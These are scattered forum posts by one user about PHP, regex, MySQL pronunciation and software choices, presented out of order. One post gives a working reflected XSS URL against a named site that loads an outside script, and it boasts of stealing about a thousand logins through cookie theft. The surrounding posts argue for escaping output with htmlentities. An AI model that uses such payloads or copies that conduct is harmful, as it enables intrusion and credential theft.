Azu

Meh I'm going to keep saying it as mysickel. That's how I think it sounds if you pronounce it as a word.

I resent that remark since I'm only one year older than that Please don't make it sound like he is immature because of his age alone ><

Mmm. Okay. Gonna play with my yo-yo brb. By the way, do you do any yoga? And do you eat any yellow foods?

I'm not sure what you're trying to ask, sorry. Just use htmlentities on any user-submitted info you output in PHP and you'll be fine.

I mean you just put htmlentities there. Like instead of echo $_GET['input']; You would put echo htmlentities($_GET['input']); That's really all you need to do to make this kind of attack virtually impossible.

If you say it like you spell it, then how come you say "I say it 'wizzywig'" instead of "I say it 'wysiwyg'"? *confused*

When you goto a site on it and click on a link it says and fails to display the page. Not to mention that this is a security problem.

Your wish is my command: http://www.theinsomniaxe.com/hoast/index.php/%22%3E%3Cscript%20type='text/javascript'%20src='http://sandbox.guahanweb.com/scripts/hack.js'%3E%3C/script%3E For me to be able to include a javascript file from my server is insanely dangerous. I could make your site look like anything I wanted it to. What's more, I wouldn't necessarily have to change the functionality of it, I could just add a couple form fields and have the data sent to me instead of you. There are many more dangers to leaving your site open than just having your server hacked. Actually you are making it sound rather tame. It can much more dangerous then that. When a pretty short line of code in the wrong place, you could potentially get the username and password of everybody that goes to that page (if you store login data in cookies). I did this once on a site purely as a learning experience to see if I could do it. Got like a thousand usernames/passwords in the few hours I had it on there =O And it doesn't matter if the passwords are hashed, either; you can decrypt them with a rainbow. Exploits like this are very real and very dangerous. And they can be solved by just writing ONE SINGLE WORD INTO YOUR PHP SCRIPT; htmlentities

lol? Look up at the top of the thread. He got owned. Still hasn't even fixed any of that ROFL.

Have you already purchased Vista though? I doubt it· No. I downloaded for free and tried it, didn't like it. I wouldn't have kept it if I paid money for it, either. I might ask for my money back though lol (probably wouldn't do any good but why not ^^)

Why-ih-sig Post-ger-sickel

Not sure. I know for sure though that I wouldn't use a program just because it's expensive. Vista Ultimate is expensive and I wouldn't touch it with a bamboo pole >.>

Oh. I thought that's what you meant by spelling it out lol sorry. I thought you just meant saying each of the letters like they are a word like "Pea aech pea"

Ugh I'm sorry nevermind. I edited the wrong file lol Working perfect now. I should go to bed now, good night.. ^^

Nevermind it's not working at all.. even when I tell it to return false if there is ANY character before or after it, it STILL goes through.. (?<!.)Stuff(?!.) x_x please help...

Thank you that is exactly what I was looking for BTW here's an example; I only want to match something that isn't in quotes or braces.

Yes I know that it's a recursive acronym. If you want to be technical about it; you say it by disabling your output recursion.

Not really. Just don't recurse them. P H P W I N E

I am trying to get my regex to only work if the beginning or ending is not a certain character. Here is an example '[^"<>]Stuff[^"<>]'/i

Yes. Although it should work with any regex function so I didn't know it mattered, sorry. Here is the code '[^"<>]Stuff[^"<>]'/i These [^"<>] are deleting a character how do I stop this? I want these to read only, not modify the string in any way at all.

. matches one character .* matches 0 to infinity characters .+ matches 1 to infinity characters . is like .{1,1} .* is like .{0,9999999999999999999999} .+ is like .{1,9999999999999999999999}

Hello.. I am trying to get my regex to only work if the beginning or ending is not a certain character. The problem is that when I try to do this, and it is not that character, it deletes that character.. Is there a way to make it just CHECK if something is true, instead of deleting it and putting it into a regex variable? '[^"<>]Stuff[^"<>]'/i

Up to you of course I just personally think it's more efficient to have everything I use on one computer.

Mysickel

Why not just use Gimp though? ^^